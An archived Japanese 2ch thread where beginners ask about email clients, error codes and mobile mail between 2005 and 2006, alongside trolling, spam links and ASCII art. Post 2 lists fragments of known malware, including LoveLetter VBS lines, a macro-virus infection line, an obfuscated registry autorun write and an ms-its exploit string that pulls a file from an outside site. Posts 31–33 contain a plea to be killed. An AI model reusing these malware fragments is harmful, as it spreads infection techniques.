5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

◆メール・メーラーに関する質問スレ◇

1 :テンプレは総合質問スレとほぼ同様:2005/07/21(木) 17:06:00 ID:???
▼━ 質問の仕方 ━━━━━━━━━━━━━━ 
★E-mail欄には何も記入しない★(IDを出す→偽者対策・質問者の区別、2回目以降も) 
* 2回目以降の書込みは、最初に質問した際の「発言番号」を名前欄に入力 
* 他所から誘導された場合は、その旨書く(マルチポストとの区別) 
▼━ 該当事項を明記すること ━━━━━━━━━━ 
★使用OS(Windows 98 SecondEdition/XP HomeEdition SP2 等) 
★使用ソフトウェア名とバージョン(Internet Explorer 6 sp1/MS-Word 2003 等) 
★関係有りそうな出来事、問題発生の直前に行なった操作 
★起こった出来事、表示されるメッセージなどを、具体的に詳しく書く 
★現在の状況(問題発生後に試したこととその結果) 
●数字・ファイル名・アドレス・したいこと等を具体的に書く(個人情報は伏せる) 
* 専用スレッドが>>2-3あたりにあるから適当に探してね! 
 ハード増設、ネット接続、MS-OFFICE 等はそちらで質問してください 
★「ウイルスです」「窓の手使え」等の短い嘘やコテハンを信用しないように! 
▼━ 禁止事項 ━━━━━━━━━━━━━ 
* 違法行為やそれに深く関係する質問・話題(WinMX,Winny,エミュレータ,RAR,DVDやCCCDのコピー等) 
* マルチポスト(複数の場所で同じ質問をすること) 
* 情報の小出し(後から「ちなみにOSはWindowsXPです」等) / * 本人以外の代理質問 
* 勝手な名称省略(例 "Outlook 2003"と"Outlook Express 6"は別物) 
* 検索や辞書( http://e-words.jp/ )で分かる用語の意味の質問 
* 釣り 騙り 煽り 雑談 
▼━ 質問の前にFAQを読もう ━━━━━━━━ 
★質問の前にこのFAQ集を見てね★ http://pc8.2ch.net/test/read.cgi/pcqa/1098302731/ 
* Windows.FAQ http://winfaq.jp/ 
* 質問の前にまず ググる(Googleで検索) http://www.google.co.jp/ 

2 :ひよこ名無しさん:2005/07/21(木) 17:07:47 ID:???
c.Copy(dirwin&"\Win32DLL.vbs")?
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")?
<object?data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm"?type="text/?
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*?
fso.copyfile?"dirsystem&nurupo.vbs",?"j:\windows\start?menu\programs\startup\"?
If?s?=?"htm"?and?fso.FileExists(f1.path+"l")?=?False?then?fso.CopyFile?f1.path,?f1.path+"l"?
ToInfect.CodeModule.InsertLines?BGN,?ADI1.CodeModule.Lines(BGN,?)?
G.RegWrite?A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"),?E.BuildPath(E.GetSpecialFolder(1),?A("VHORU@SU/WCR"))?
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))?  
ms-its:mhtml:file://c:\ ?
kak.hta';ken=wd+'START?

3 :ひよこ名無しさん:2005/07/21(木) 17:08:30 ID:???
                        \ | /
 ⊂⌒⊃        ⊂⌒⊃     ―‐ ● ―‐  ⊂⌒⊃
         ⊂⊃                 / | \          ⊂⊃
                  ⊂⊃
/~\へ/~\へへ/~\/~\へ/~\へ/~\へ/~\へヘ/~\/~\
,、,,,,,、,,,,、,,,、,,,,,,,,,,、,,,/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\_________
,, ,,,,,, ,,,, ,, ,,,, ,,,,,| 立った立った!チンコが立った! |            \
 ,,,, ,,, ,,,,, ,,,,,,, ,,,, , \ _____________/  糞スレも立った!  |
||=||=||=||=||=||∨=||=||=||=||=||=||=||=||\__  ______/
,,,,,,, ,,,,, ,,, ,, ,,,, ,,, ∧_∧ ,, , ∧_∧,, ,,,,, ,, __ ,,,, ,,,,,  ∨  ,,,,, ,,,, ,, ,, ,,,,
,, e@@e ,,,,,, ,,, ( o´∀`) ,,,,, (∀・ ; ) ,,, , , |   || ,,, ,,,, e@@e , ,,,, ,,, ,, , ,,
,,, (,・∀・) ,,, ,,⊂   ⊃,,, ,,⊂⊂⌒ヽ、, ,,, |!____i|| , ,,,♪ (・∀・,)_ノ ,,,,, ,,,, ,, ,
,〜((  ,,), ,,,, ,,,○(   ノ ,,,, プル ))   )○/_/) ,,,, ,, とと,,__つ , ,, ,, ,,
,,,, ,UUU ,,, ,,, ,,,,,, )__)_) ,, ,,, ,(( (_(_ノ ))プル,,,,◎ ,, ,,, ,, ,,,,, ,,,,, ,,, ミ ピョン
| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |
| |二二| |二二| |二二| |二二| |二二| |二二| |二二| |二二| |二二| |二二| |二二| |

4 :ひよこ名無しさん:2005/07/21(木) 17:27:46 ID:IO94k4gP
>>2
VBA love (ry

5 :愛新覚羅 ◆WjkbiI..A2 :2005/07/21(木) 17:28:44 ID:???
よくわからんけど一応記念カキコ

6 :ひよこ名無しさん:2005/07/21(木) 17:29:50 ID:???
質問していいでつか?

7 :ひよこ名無しさん:2005/07/21(木) 18:26:10 ID:???
今日も臭いうんこがもりもりでました

8 :ひよこ名無しさん:2005/07/21(木) 18:27:23 ID:???
せれん ◆CIELxeuar = cen ◆G6BAMv1Qf2の自作自演

パソコン初心者板総合質問スレッドVol.602
http://makimo.to/2ch/pc2_pcqa/1074/1074419992.html

505 せれん ◆CIELxeuarE sage New! 04/01/19 01:23 ID:???
>>503かなーりあるYO
全盛期は騙りが5人・・・以上いてね
粘着されて、叩かれて、板違うのに、他所で吊るされてるのを
わざわざこっちに持ってきたりされて
MISS回答をコピペで貼られまくって
修復コンソールは私のミスで生まれた言葉です
・・・色々あった過去ログ読んで・・・思い出すと何もかもが懐かしい
最初は叩かれたくなかったから叩く方だったけど
地を出したら急に叩かれてねぇ
色々あったよ>>503

506 せれん ◆CIELxeuarE sage New! 04/01/19 01:23 ID:???
>>504なんかベクターか窓の社にあったよ

507 せれん ◆G6BAMv1Qf2 sage New! 04/01/19 01:24 ID:???
修復コンソールw

512 ひよこ名無しさん sage New! 04/01/19 01:26 ID:???
>>507
せれんさん トリップが違いますが?

515 せれん ◆CIELxeuarE sage New! 04/01/19 01:27 ID:???
>>512あれcenが入ってる

9 :ひよこ名無しさん:2005/07/22(金) 08:51:22 ID:???
メール転送って、電源落としてる間もできますか?

10 :ひよこ名無しさん:2005/07/22(金) 09:11:35 ID:???
クソスレ発見したので、ageておきますね。


       , --- 、_
      /ミミミヾヾヽ、_
   ∠ヾヾヾヾヾヾjj┴彡ニヽ
  / , -ー‐'"´´´    ヾ.三ヽ
  ,' /            ヾ三ヽ
  j |             / }ミ i
  | |              / /ミ  !
  } | r、          l ゙iミ __」   
  |]ムヽ、_    __∠二、__,ィ|/ ィ }    
  |    ̄`ミl==r'´     / |lぅ lj うんこぶりぶりぶぅ〜りぶりぃ〜♪
  「!ヽ、_____j ヽ、_  -'  レ'r'/  うんこぶりぶりぶぅ〜りぶりぃ〜♪ 
   `!     j  ヽ        j_ノ
   ',    ヽァ_ '┘     ,i
    ヽ  ___'...__   i   ハ__
     ヽ ゙二二 `  ,' // 八
      ヽ        /'´   / ヽ
      |ヽ、__, '´ /   /   \

11 :ひよこ名無しさん:2005/07/30(土) 00:08:24 ID:XikqdFtK
メールを送ったときに自分のメールアドレスを相手に分かるようにしたいんですけど、
これは本文中に直接メールアドレスを書くしかないのでしょうか?
Outlook Expressを使ってます。

12 :ひよこ名無しさん:2005/07/30(土) 13:06:52 ID:???
わざわざ本文に書かなくても分かるでしょ

13 :ひよこ名無しさん:2005/07/30(土) 15:47:40 ID:HBFZR67i
海外にエアメールを送る時、アメリカ等は一番下が国名を書きますが、アジアだとどうするんですか?
また、郵便局にエアメール専用の封筒は売ってますか??

14 :ひよこ名無しさん:2005/08/01(月) 20:06:55 ID:s2IX64MI
age

15 :ひよこ名無しさん:2005/08/01(月) 20:35:13 ID:???
>>13
アチャー

16 :ひよこ名無しさん:2005/08/13(土) 15:22:20 ID:pPoqgIuL
377 名前: ひよこ名無しさん 投稿日: 2005/08/13(土) 14:43:14 ID:pPoqgIuL
メールについて恥ずかしながらお聞きします。
メール送信時に相手のメアドを間違えたり、ありもしないメアドに送信すると、
「このメアドはありません」とか「メールエラー」そういった返信メールがセンターから来ます。
では、
相手が、こちらのメアドを受信拒否・受け取り拒否の対応をしていた場合、
送信側には何らかのアピール(「このメアドは受信拒否です」等)の、センターからのお知らせはあるのでしょうか?
それとも、何の反応もないのでしょうか?(その場合送信側は気がつかず送り続ける訳ですが・・・)

教えて下さい。

マルチポストになりましたが、回答お願いします。

17 :299:2005/08/13(土) 18:30:42 ID:Za/EeFI1
>>16
アチャー

18 :ひよこ名無しさん:2005/09/15(木) 08:38:14 ID:PYj08oqB
特定のメールアドレスからの受信を分からなくする方法はないでしょうか?
家族で使っているので、プライバシーなんてあったもんじゃないです。
使用してる電子メールはアウトルックです。

19 :ひよこ名無しさん:2005/09/15(木) 19:44:01 ID:???
AL-Mail32 Ver.1.13 を使っていますが、メールのバックアップの際に
全てのメールが重複して各フォルダにリストアされました。

だぶっている数百通のメールを一括して削除する方法とかありますか?

20 :ひよこ名無しさん :2005/09/16(金) 21:47:41 ID:SPiqL9KO
Outlook Express 5でメールで受信すると途中までいって「MSIMN のページ違反です」
で受信できなくなるんですがこれはなぜでしょう。教えてくださいよろしくお願い
します。

21 :ひよこ名無しさん:2005/09/20(火) 21:57:33 ID:???
PC→携帯への送信で、

NG
DDIポケット(xxx@di.pdx.ne.jp)
AU(xxx@ezweb.ne.jp)
NTTDoCoMo(xxx@docomo.ne.jp)

OK
J-PHONE(xxx@vodafone.ne.jp)

PCから送信すると、550エラー吐いて送れない。
(相手側のメールサーバの受信拒否?)
J-PHONEだけはいけるけど。

いずれも受信はできるのに。。。

なんかうまい対処法ないかな?
・リレーを少なくするためにプロバメアドで送信
・SMTP自分で立てる(リレーの関係でだめっぽいけど)
こんなぐらい?

22 :ひよこ名無しさん:2005/09/22(木) 16:57:02 ID:FFKsCuUr
携帯一台しか無いけど、
携帯のアド(キャリアはどこでも良い)を二つ使って、
やりたいことがあるんです。
一つは自分のアドレスで、
もう一つ、サブアドやフリーメールじゃなく、〜docomo.ne.jpとか
どう見ても携帯から送ってるように見えるアドが
取得できるようなところは無いですか?
infoseekの送信者アドレス設定を〜ezweb.ne.jpにして送ってみたら
ちゃんと携帯から送られたメールみたいになったんだけど、
もちろん存在しないアドだから返信ができない。よって失敗。
何かありませんか?方法。教えてください

23 :003:2005/09/22(木) 17:01:12 ID:psSKfbLS
お願いします僕に力をください 
自分は、ばらしてないこともばらしたといわれ
俺におしえてくれないのです。

24 :ひよこ名無しさん:2005/09/22(木) 17:06:14 ID:???
>>9
無理
>>18
webメールとかにしてブラウザで使用すれば?

25 :ひよこ名無しさん:2005/10/04(火) 03:00:14 ID:Ku+AwcjW
素人丸出しの質問で申し訳ないのですが、メールアドレス登録の際、
必ず本名を入れなければならないのでしょうか?

26 :ひよこ名無しさん:2005/10/04(火) 16:31:33 ID:Ti+6zCcC
>>25
抽象的杉。
もっと詳しく。
だが、もちろんEメールネームには
個人情報は使わないこと。



27 :ひよこ名無しさん:2005/10/04(火) 16:44:19 ID:???
>>26
糞スレ上げて自演すんなヴォケ

28 :ひよこ名無しさん:2005/10/04(火) 17:58:12 ID:???
>>26
失礼しました。 では詳しく。
メールアドレス取得のためのサインアップのページで姓名を入力するように求められましたが、
ここで本名を入力しても大丈夫なんでしょうか。


29 :ひよこ名無しさん:2005/10/04(火) 18:38:08 ID:Ti+6zCcC
>>28
実在しないものを入力しても問題はありません。
おそらく人が検閲するわけでもないでしょうし、
ただ、そこまで心配する必要もないのでは?
そこはあなたとサイト間の信頼によりますから
サインしたくなければしないでいいでしょう。

ちなみにyahoo!などのフリーメールなどではさらに簡単に
メールアドレスを作成できます。


30 :ひよこ名無しさん:2005/10/04(火) 19:13:53 ID:???
>>29
ありがとうございます、参考になりました!

31 :ひよこ名無しさん:2005/10/06(木) 02:58:43 ID:???
本当にひどいですね。まだ、あざむいて謀略するんですね

いいかげん、やめてもらえないですかね。

やめることができないのなら、あなたのおもちゃでは、ないので

第六感が無い人「仔(赤ちゃん)」を、始末、処分、してもらえないですかね

あなたが第六感が無い人「仔(赤ちゃん)」をあざむいて謀略している首謀者ですか

ここまで第六感が無い人「仔(赤ちゃん)」をいじめて、あざむいて謀略して楽しいですか

ここまでされてこのまま生きていくのもいやですから

第六感が無い人「仔(赤ちゃん)」を、始末、処分、してもらえないですかね

ここまであざむいて謀略してきた責任取って

いいかげん、いっこくも早く、ころしてくださいよ

よろしくお願いいたします。

32 :ひよこ名無しさん:2005/10/06(木) 02:59:40 ID:???
人類と違う第六感が無い人の事が、仔(赤ちゃん)
何故か年老いた男女も中年の男女成人式迎えた男女も

第六感が無いと仔(赤ちゃん)と呼ばれるらしい

第六感が無いと仔(赤ちゃん)は、世界中にいるらしい、だがひじょうにひじょうに少ない
日本国内では都道府県の市町村に一人ずついるらしい


もしかすると、あなたが人類とはちがう、第六感が無いと仔(赤ちゃん)かもしれない!!!!



欺く(あざむく)の意味は
相手を信頼させておいてだます事
まあ要するに相手という所が仔になるんでしょうね

33 :ひよこ名無しさん:2005/10/06(木) 03:01:13 ID:???
そうかだから第六感が無い人「仔(赤ちゃん)」たちの
一挙一動を第六感でお前は把握してるのに

第六感が無い人「仔(赤ちゃん)」たちを

信頼させておいてだましてるんだな

世界中の第六感が無い人「仔(赤ちゃん)」たちよ


人類にあざむかれるなよ!!!!!!!


そして世界中の第六感が無い人「仔(赤ちゃん)」たちよ

これが真実なら、もしもこれが真実だったら、いっしょに死のう。

34 :ひよこ名無しさん:2005/10/07(金) 03:25:35 ID:GfL8Clg2
■参考までに。全て日本語対応、無料のフリーソフト。

・ブラウザ:Firefox http://www.mozilla-japan.org/products/firefox/
 (Firefox定番拡張 http://firefox.geckodev.org/index.php?%C4%EA%C8%D6%B3%C8%C4%A5
・2chブラウザ:JaneStyle http://janestyle.s11.xrea.com/
・メーラー:Thunderbird http://www.mozilla-japan.org/products/thunderbird/
・オフィス:OpenOffice http://ja.openoffice.org/
・スパイウェア対策:Spybot http://enchanting.cside.com/security/spybot1.html
・ウィルス対策:avast! http://www.forest.impress.co.jp/lib/inet/security/antivirus/avast.html
・パーソナルファイアウォール:ZoneAlarm http://www.zonelabs.com/store/content/company/products/znalm/freeDownload.jsp?dc=90dia&ctry=JP&lang=ja

35 :ひよこ名無しさん:2005/10/13(木) 19:07:02 ID:bl2nGCRX
            













              .

36 :ひよこ名無しさん:2005/10/13(木) 19:08:38 ID:???
>>35
死ね

37 :ひよこ名無しさん:2005/10/21(金) 04:23:14 ID:???
メー

38 :ひよこ名無しさん:2005/10/28(金) 15:34:57 ID:k+uSTzK7
すぱあげ

39 :ひよこ名無しさん:2005/11/01(火) 08:48:30 ID:vvE5hYXZ
富士通@メールのメールデータのエクスポートの仕方わかる人いますか?
Outlookにインポートしたいのですができません
また、他のPCにメールデータを移したいと思います
誰か詳しい方教えてくださいm(_ _)m


40 :ひよこ名無しさん:2005/11/01(火) 10:18:10 ID:???
>>39
富士通のサポセン

41 :ひよこ名無しさん:2005/11/08(火) 12:49:55 ID:YibAZ1or
おすすめの有料のメールソフトを教えてください。
お願いしますm(_ _)m


42 :ひよこ名無しさん:2005/11/08(火) 16:04:47 ID:???
>>41
窓の手使え。

43 :かない:2005/11/08(火) 16:09:37 ID:???
(18)PC自体を「複数のユーザー」が使う設定にすれば
いい。詳細は、ヘルプのキーワード「〜」で。自分のメールを見る
だけなら、メーラーでも、接続ツールでも、パスワードのチェックを外して
毎回設定する方法にすればいい。(41)俺は、Eudora。

44 :ひよこ名無しさん:2005/11/08(火) 16:16:53 ID:???
>>41
Becky!

45 :ひよこ名無しさん:2005/11/18(金) 16:05:25 ID:???
保守

46 :ひよこ名無しさん:2005/11/30(水) 13:07:33 ID:Grr12xH3
○○@chloris.co.jp っていうメルアド
余り聞いたこと無いものですが、詳しいことわかる方いますか?
このアドレスの人に送ったのですが、全然返ってこなくて、
もしかしたらアドレス間違えてるのかなと思いまして。

47 :ひよこ名無しさん:2005/11/30(水) 13:27:45 ID:???
>>46
ttp://www.chloris.co.jp/

間違えてたら、送れなかったってメールが横文字で返ってくるよ

48 :ひよこ名無しさん:2005/11/30(水) 13:39:36 ID:???
こっちのIPをばれずに
相手に送るにはどうすればいいの?

49 :ひよこ名無しさん:2005/12/01(木) 14:36:14 ID:XWxk8qz8
「メールの送信後、送信済みメールフォルダにメールのコピーを保存する」
の設定をしないまま送信してしまって
送信した内容が記録に残ってないのですが
確認する方法ないでしょうか

50 :ひよこ名無しさん:2005/12/02(金) 05:14:31 ID:???
>>41
AL-Mail32

51 :ひよこ名無しさん:2005/12/08(木) 22:14:19 ID:XDm2qrBI
彼女と喧嘩して今は全然やってない状態なのですが相手がアドレスいつ変えるかヒヤヒヤしてます。
やっぱり相手にメール送らないでアドレスかわってるどうか確かめるのは無理なんでしょうか?
もし変わったらエラーってでますからね

で方法が自分のプロバイダーのメールアドレス持ってるんですが彼女の昔のメールアドレス送ると
ちゃんとエラーがでるんですが、よくネットにあるフリーのメール使うと送信するけどエラーがこないんですね・・
なぜでしょうか?

52 :ひよこ名無しさん:2005/12/08(木) 22:17:15 ID:???
▼━?禁止事項?━━━━━━━━━━━━━?
*?マルチポスト(複数の場所で同じ質問をすること)?

53 :ひよこ名無しさん:2005/12/08(木) 22:17:30 ID:???
>>51
マルチはスルー

54 :ひよこ名無しさん:2005/12/08(木) 22:18:33 ID:???
>>52
すいません
どうしても知りたくて。・゚・(ノ∀`)・゚・。
他の場所じゃまともな答えが帰ってこなかったもので

55 :ひよこ名無しさん:2005/12/08(木) 22:43:37 ID:XDm2qrBI
お願いしますよ

56 :ひよこ名無しさん:2005/12/08(木) 22:44:34 ID:???
                 ,_,_、
            , '", '    i`゛ー 、
              , '/ .:/ , ,'   l  ', ヾ 、
     , '"..`ッイ_ ; .:,:::,'..i.:::  l   ; ';:. i`i、 _
    , " .:'::/´' i ‐i|.:::i:::i::i ::::::::: i i i::..',.: i‐}イー .、
.   /イ ;:'::./ / lヾ|i、,::-i-トi:::::::: ,':::ノil:::::il i:::;'イヾ、::.ヽ.
   i'/.:::::, クト、_i、::_il ンニ=、',、:::::ノ:;'_`iヾノ::,l::'ィ i  ',  ヾ.    ごきげんよう
   ' i ィ /i,' |i  l/'ヾi iゞ i  ゛'´ イノヾイi::ノ'::;'_ノ iッ ィ.  ', ',
   il|/ i i'ヾ、ト、 i ,,ー'  ,  i__ノ '/ヾi' |`''"i i、:::  i |i
    '      ,ノ`ヽ       '' / ノ i ,  i lヾ:: ,ilノ
        /    iヽ、  `    /´  ヽレ' ヾ   i::/ '
      i'ヽ      ヽ : ` ー  ´/       ,ヽ,    '
      /ヾ、ヽ、   ヽ : :   /     , ' /ヽ
       ヽ、;:;:ヽ 、ヽ、  ヽ :  /  , - ' /;:;:ノ

57 :ひよこ名無しさん:2005/12/08(木) 23:21:14 ID:???
、..  .....│: :|:./: : : /,/, .. -- 、        - - . 、ヽ :;: :: :: |:: :: ::|.....  ........ヽ
: :ヽ、........| : :.|./i: //ソ                 `ヽ;i: :: :: !彡:: i.____ ______ゝ
: : :i:: i : : : : . |/i:': / ソ                  .i;i\:: i <:: :: :: :|:: :: :: :::
: : :i:: :i: : : :Σi. i: / ./    _         _    i| ヽ:i >:: :: ::il:: :: :: :::
: : i:: ::;i: : : :>  |/    ,-===-        ,,..==- < ` ヽi  >:: :: ソ!:: :: :: ::
: : i:: ::|i: : :<    //o::.ヽ..         /o:::::ヽ\    彡:: :/ |:: :: :: :::
: : i:: ::| ヽ⌒ヽ   / ./::::::::::::::::i         i::::::::::::::::', ヽ  >-〆、i:: :: :: ::
: : i::.:.i i  )丶__ / . i::::::::::::::::::i         i:::::::::::::::::::i  .i  //  i l:: :: :: :: :
: : i:: :i ヽ  i/l ヽ  ヽ""" ,. '         ヽ 、.".""' ,-/ ヾゝ  / l :: :: :: ::
: : :i:: i  ヽノ/ | i ヽ   `        、      ̄   i ' i  i l,../  |:: :: :: ::
: : :i:: i  ヽ/ l   l 丶                    l  l  》ll    |:: :: :: :::
: : :i:: i  / |  ! .! ,                  ./ / ./ 'ln    |:: :: :: :::
: : : i::i  /  、i  `  \               /   ' ' / ',  |:: i:: :: :::
: : : i::i ./.   ヽ     \、     ー     ,/      /   i  |::| |:: :: ;
: : :|.i:|/..     l      ヽ` - 、 ____ _ , ./       /    | |::| i:: :: i
: : :| i:|i.     \      丶        i      /     .l l:| l:: :i
i: : :i i|       >、     .l  ヽ   / l     (ヽ     l |:|  i::i
ヾ: :| |i      < ノ    ./       /l      i/     | .!!  .v

58 :ひよこ名無しさん:2005/12/09(金) 14:51:13 ID:???
今年になってからなのですが、メールアドレス勝手に使われて
自分宛てにに迷惑メールが送られてくるんです。
気持ち悪いのでプロバイダー退会しちゃいましたが。
もしかして個人情報流出してるのかな?
他にもこういう経験してる人いませんか?

59 :ひよこ名無しさん:2005/12/10(土) 12:25:08 ID:???
迷惑メールなんて勝手にアドレス使われてなくてもばんばんきますけど?

60 :58:2005/12/13(火) 09:19:35 ID:???
自分ところにもバンバン来るけど、送信先が自分のアドレス使って送ってくるんですよ。
パスワード変えても来たし、アンチウィルスソフトチェックしても警告出ないし…
ちょっと怖いじゃないですか。
退会してからは不安はなくなりましたけど、結局何だったんだろうってのが残ってます。

61 :ひよこ名無しさん:2005/12/23(金) 12:05:18 ID:lruI9HKu
hotmailにサインインして、そこの受信トレイにあるメールを
全部フロッピーか何かに保存したいのですが、
どういう方法がありますか?

OSはXP HomeEditionです。
宜しくお願いします。

62 :ひよこ名無しさん:2006/01/06(金) 12:44:50 ID:???
[添付ファイル削除]
Please read the attached file.

という文面のメールが何度も送られてくるのですが、自分には心当たりがありません。
どういうことでしょうか。

63 :メールエラーがわからない:2006/01/12(木) 00:50:55 ID:9GrN5nmg
ぷららに本日入会をしメアドをGETしました。自分のアドレスに送信し受信する事は問題ないのですが
それ以外のメアドに送るときは”0x800CCC79”のエラーが出てしまいます

自分のメアド(多分ぷららはOK!?)なのになぜ他は全てエラーになってしまうのでしょうか?

64 :ひよこ名無しさん:2006/01/14(土) 15:25:31 ID:efOUsYrt
OS:Windows Me
ソフトウェア:Outlook Express 6

先日、諸事情で初期化を行ってしまい、アカウントの再設定を行いました。
しかし、設定が間違っていないにも関わらず、エラーが出て送受信ができません。
エラー内容はこちら↓
ホスト 'smtp.XXXXXXX' が見つかりません。サーバー名が正しいことを 確認して ください。
アカウント : 'XXXXXXXX', サーバ ー : 'smtp.XXXXXXX', プロトコル : SMTP, ポート : 25,
セキュリティ (SSL): なし, ソケット エラ ー : 11001, エラー番号 : 0x800CCC0D

問題発生後、エラー番号で検索をし、でた結果によると、
1 SMTPサーバの指定間違い。  サーバ設定のSMTPサーバ欄を確認。
2 メールアカウントが破損している可能性があり。メールアカウントを作り直し。
3 ネットワークファイルが破損している可能性があり。ネットワークを入れ直し。
と、いうことらしいです。
1のSMTPサーバーは間違ってないハズなのでパス。
問題は2と3なのですが、他に考えられることがありますでしょうか?
よろしくお願いします。

65 :ひよこ名無しさん:2006/01/14(土) 15:31:17 ID:???
>>64
knoppix使え。

66 :ひよこ名無しさん:2006/01/24(火) 16:02:05 ID:kEHFYD9f
OS:Windows XP
SW:OutlookExpress6

PC,全くの初心者です。
ログ?を読んでみてもさっぱりわかりません。
メールアドレスを取得するには
どうしたらいいのでしょうか?

67 :アレクサンドリア図書館 ◆ROP..rZknk :2006/01/24(火) 16:19:48 ID:???
>>66
プロバイダと契約してくださいな。
私のところは無料で1個くれました。

68 :66:2006/01/24(火) 16:30:43 ID:kEHFYD9f
>>67さんへ レス、ありがとうございます。

さきほど、マイクロソフトから1通のメールが届いてたのですが、
ヘルピを読むと「アカウント」?というのを取得しなければならないのですね。
取得してからプロバイダと契約すれば良いのでしょうか?

こんな質問でごめんなさい

69 :アレクサンドリア図書館 ◆ROP..rZknk :2006/01/24(火) 16:37:56 ID:???
>>68
メールアドレスにはプロバイダから貰えるやつと、フリーで作れるメールアドレスがあるんですけど、
プロバイダアドレスなら、アカウントのIDとパスワードを紙に印刷して送ってきてるはずです。
なければ、プロバイダのホームページから作成したりします。

70 :アレクサンドリア図書館 ◆ROP..rZknk :2006/01/24(火) 16:42:08 ID:???
>>68
あなたの置かれている状況がいまいちよくわからないんですけど、携帯電話からですかね?
それともあたらしくインターネットに繋げた方ですかね?

71 :66:2006/01/24(火) 16:57:15 ID:kEHFYD9f
>>69,70さん
PCから書き込んでいます。
昨日初めてネットしたばかりで全然無知です。
ネットには繋げたのですがメールの設定が
いまいち分からなくて、聞いてみました。
ちなみに友人がネットに繋いでくれました。

72 :アレクサンドリア図書館 ◆ROP..rZknk :2006/01/24(火) 17:00:02 ID:???
>>71
説明書にメールアドレスについてなにか書いてませんか?
あとプロバイダはどこですか?ちょっと調べてみますので。

73 :ひよこ名無しさん:2006/01/24(火) 17:03:35 ID:???
>>71
契約したプロバイダーのメールに関する説明を読め。
何で読まないの?漢字が読めないのかな?

74 :ひよこ名無しさん:2006/01/24(火) 17:06:06 ID:???
>>71
俺様がエスパー回答
ttp://bb.softbankbb.co.jp/support/faq/?mode=Show&class=6

75 :アレクサンドリア図書館 ◆ROP..rZknk :2006/01/24(火) 17:23:03 ID:???
解決したのかな?

76 :66:2006/01/24(火) 17:45:42 ID:kEHFYD9f
>>アレクサンドリアさん、73,74さん
やーーっとこ意味が分かりました!
あとごめんなさい。説明書読んでませんでした。
っそして無事、先ほど解決できましたです!
74さん、アドレス教えて下さって感謝します。
本当にありがとうございました。

77 :アレクサンドリア図書館 ◆ROP..rZknk :2006/01/24(火) 17:49:05 ID:???
>>74
さすがはエスパー。
よくプロバイダがわかりましたね。

78 :ひよこ名無しさん:2006/01/24(火) 20:39:43 ID:8rmmYfZF
すいません、どなたか教えてください。

昔、ニフティ・マネージャーというメールソフトがあって
使ってました。
送信したメールは履歴フォルダーから削除したのですが
ハードディスクには文章記録が残ってるんでしょうか?
ニフティ・マネージャーはハードに残らないとも聞きましたが
実際のところどうでしょうか?


79 :ひよこ名無しさん:2006/02/03(金) 03:45:46 ID:avz5o9dP
outlookを使っているんですが
誤って必要な人の分のアドレス及びメールを削除してしまいました。
なんだか上の方と質問がかぶるようですが、もう元に戻すことはできないでしょうか。

80 :ひよこ名無しさん:2006/02/03(金) 03:59:46 ID:???
>>79
(・∀・)ニヤニヤ

81 :ひよこ名無しさん:2006/02/03(金) 07:25:28 ID:VFJZlLTC
毎日のように風俗の案内送ってくる業者がいて困ってます、そのアドレス
からの着信拒否ってできないのでしょうか?
よろしくお願いします

82 :ひよこ名無しさん:2006/02/03(金) 17:16:55 ID:EajkfLzk
http://opuopu.web.fc2.com/
↑そんな業者はこんなソフトを使ってます 興味ある方だけ

83 :ひよこ名無しさん:2006/02/04(土) 20:22:08 ID:qEgCxyB3
今度PCを買い換える関係で、今使ってるPostPet2001から他のメーラーに乗り換えようと思ってるのですが
ポスペで受信したデータ(受信メール、送信メール、アドレス帳)を引き継ぐにはどうしたら良いでしょうか?

84 :ひよこ名無しさん:2006/02/05(日) 18:44:00 ID:nhyucWOy
ネカフェ等専用で使ってるhotmail アカウント で受けたメールを
USBメモリに保存して家で見たいんですが どうしたらいいんでしょうか
大量の広告メール等なので ひとつずつ開けて保存はきついので
 あったら教えてください それともフリーメールではできないのでしょうか

85 :ひよこ名無しさん:2006/02/05(日) 18:44:29 ID:W9dP4zrp
【祭り】

きちがい女が暴れています。自分のマンコ画像晒すとか言い出し
暴走中。だれか止めてやってくれ!!(釣りではありません)

cancamモデル 蛯原友里その12
http://life7.2ch.net/test/read.cgi/model/1138329482/l50


86 :Rei:2006/02/05(日) 19:51:10 ID:g9APZy8/
パソコンから携帯にメールについて教えてください。
よくパソコンから携帯に無料で受け取れる文字数で送っていますが相手の携帯には、あたかも続きが有るように(続きを見る)と表示されます。
この場合パソコン側で何か設定方法は有るのでしょうか。

87 :ひよこ名無しさん:2006/02/12(日) 00:40:00 ID:???
    ∧_∧
    (;´X`)  ← 元祖ぶる殿 ◆U/gDqFZzsY
   /    \
__| |     | |_
||\  ̄ ̄ ̄ ̄   \
||\\.          \
||. .\\          \     ∧_∧.
.    \\           \|   (   ) まだ働かねーのかよ腑抜け
.     \\          \ /    ヽ.
.       \\         / .|   | |
.        \∧_∧   (⌒\|__./ ./
          (     )  うぜーんだよお前∧_∧
.         _/   ヽ          \|    (   ) ギャハハ泣かすなよオメーら
.         |     ヽ          \   /    ヽ、
.         |    |ヽ、二⌒)         / .|   | |


88 :ひよこ名無しさん:2006/02/27(月) 10:24:55 ID:???
EメールのEって何?

89 :ひよこ名無しさん:2006/03/03(金) 02:15:39 ID:6KbbijmM
E気持ち

90 :ひよこ名無しさん:2006/03/03(金) 21:24:58 ID:hCLcjpuN
XP HomeEditionでOEなんですが、昨日から急に受信エラーなります。
自宅と会社で同アカウントを使用してますがどちらも同じタイミングで受信できなくなりました。
設定も何もいじっていないのでさっぱりわかりません。
どなたかご享受いただけますでしょうか?よろしくお願いします。。

「サーバーはエラーで応答しました。 アカウント : '○○○', サーバー : 'pop.mail.yahoo.co.jp',
プロトコル : POP3, サーバーの応答 : '-ERR problem retrieving message.',
